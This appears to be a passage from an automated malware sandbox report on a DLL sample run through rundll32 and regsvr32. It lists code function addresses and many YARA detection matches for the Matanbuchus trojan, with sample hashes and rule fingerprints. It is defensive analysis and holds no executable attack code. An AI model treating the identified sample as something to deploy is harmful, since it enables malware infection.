                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F36A8E814_2_7F36A8E8
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3678CD14_2_7F3678CD
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F36867014_2_7F368670
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F35A69614_2_7F35A696
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3DD6D814_2_7F3DD6D8
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F39751014_2_7F397510
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F35A43014_2_7F35A430
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F36C42614_2_7F36C426
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F36C44C14_2_7F36C44C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F36C44814_2_7F36C448
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3594FF14_2_7F3594FF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F36B32B14_2_7F36B32B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3E53AC14_2_7F3E53AC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3D239014_2_7F3D2390
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F36C27E14_2_7F36C27E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F36412814_2_7F364128
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F39F19014_2_7F39F190
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3A818014_2_7F3A8180
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDB9EF018_2_7EDB9EF0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBFA0018_2_7EDBFA00
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED8397218_2_7ED83972
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED6B5AE18_2_7ED6B5AE
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDC456018_2_7EDC4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9AE3018_2_7ED9AE30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDAAFC018_2_7EDAAFC0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDCFFE018_2_7EDCFFE0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7DF4E18_2_7ED7DF4E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED75C4E18_2_7ED75C4E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDACC6018_2_7EDACC60
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7CC3118_2_7ED7CC31
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7CDD818_2_7ED7CDD8
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDEDDCB18_2_7EDEDDCB
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7CD5518_2_7ED7CD55
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7ED6818_2_7ED7ED68
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED6ED3818_2_7ED6ED38
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDFCAEF18_2_7EDFCAEF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDF1ABD18_2_7EDF1ABD
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDEDA6618_2_7EDEDA66
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9EA1018_2_7ED9EA10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED6DA0218_2_7ED6DA02
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7DA0318_2_7ED7DA03
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED74A3B18_2_7ED74A3B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDA0B8018_2_7EDA0B80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED778CD18_2_7ED778CD
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7A8E818_2_7ED7A8E8
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED6A9E318_2_7ED6A9E3
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDE699D18_2_7EDE699D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDE894018_2_7EDE8940
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7693B18_2_7ED7693B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDED6D818_2_7EDED6D8
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED6A69618_2_7ED6A696
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7867018_2_7ED78670
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9C79018_2_7ED9C790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDCC7B018_2_7EDCC7B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED994D018_2_7ED994D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED824EC18_2_7ED824EC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED824E218_2_7ED824E2
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7C44C18_2_7ED7C44C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7C44818_2_7ED7C448
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED6A43018_2_7ED6A430
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7C42618_2_7ED7C426
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDB154018_2_7EDB1540
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDA751018_2_7EDA7510
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDB552018_2_7EDB5520
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDB32D018_2_7EDB32D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7C27E18_2_7ED7C27E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDE239018_2_7EDE2390
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDF53AC18_2_7EDF53AC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7B32B18_2_7ED7B32B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDAF19018_2_7EDAF190
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDB818018_2_7EDB8180
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7412818_2_7ED74128
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEB9EF034_2_7EEB9EF0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBFA0034_2_7EEBFA00
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE828BF34_2_7EE828BF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE6B5AE34_2_7EE6B5AE
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC456034_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EECFFE034_2_7EECFFE0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEAAFC034_2_7EEAAFC0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7DF4E34_2_7EE7DF4E
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE82CBF34_2_7EE82CBF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEACC6034_2_7EEACC60
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE75C4E34_2_7EE75C4E
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7CC3134_2_7EE7CC31
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE6DC1C34_2_7EE6DC1C
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEEDDCB34_2_7EEEDDCB
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7CDD834_2_7EE7CDD8
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7ED6834_2_7EE7ED68
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7CD5534_2_7EE7CD55
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE6ED3834_2_7EE6ED38
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEFCAEF34_2_7EEFCAEF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEF1ABD34_2_7EEF1ABD
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEEDA6634_2_7EEEDA66
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE82A3F34_2_7EE82A3F
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE74A3B34_2_7EE74A3B
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE6DA0234_2_7EE6DA02
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7DA0334_2_7EE7DA03
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7A8E834_2_7EE7A8E8
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE778CD34_2_7EE778CD
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE6A9E334_2_7EE6A9E3
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEE699D34_2_7EEE699D
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE8399234_2_7EE83992
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEE894034_2_7EEE8940
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7693B34_2_7EE7693B
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEED6D834_2_7EEED6D8
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE6A69634_2_7EE6A696
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7867034_2_7EE78670
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE694FF34_2_7EE694FF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7C44C34_2_7EE7C44C
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7C44834_2_7EE7C448
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7C42634_2_7EE7C426
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE6A43034_2_7EE6A430
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEA751034_2_7EEA7510
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7C27E34_2_7EE7C27E
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEF53AC34_2_7EEF53AC
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEE239034_2_7EEE2390
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7B32B34_2_7EE7B32B
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEB818034_2_7EEB8180
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEAF19034_2_7EEAF190
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7412834_2_7EE74128
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7EDE1850 appears 33 times
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7EDEF80D appears 128 times
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7F3DF80D appears 128 times
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 7EEEF80D appears 128 times
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 608
                Source: file.dllStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
                Source: file.dll, type: SAMPLEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 34.2.regsvr32.exe.6b810000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 14.2.rundll32.exe.6d050000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 14.2.rundll32.exe.4910000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 18.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 22.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 14.2.rundll32.exe.4910000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 00000022.00000002.3112823931.000000006B811000.00000020.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 00000016.00000002.1885875877.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
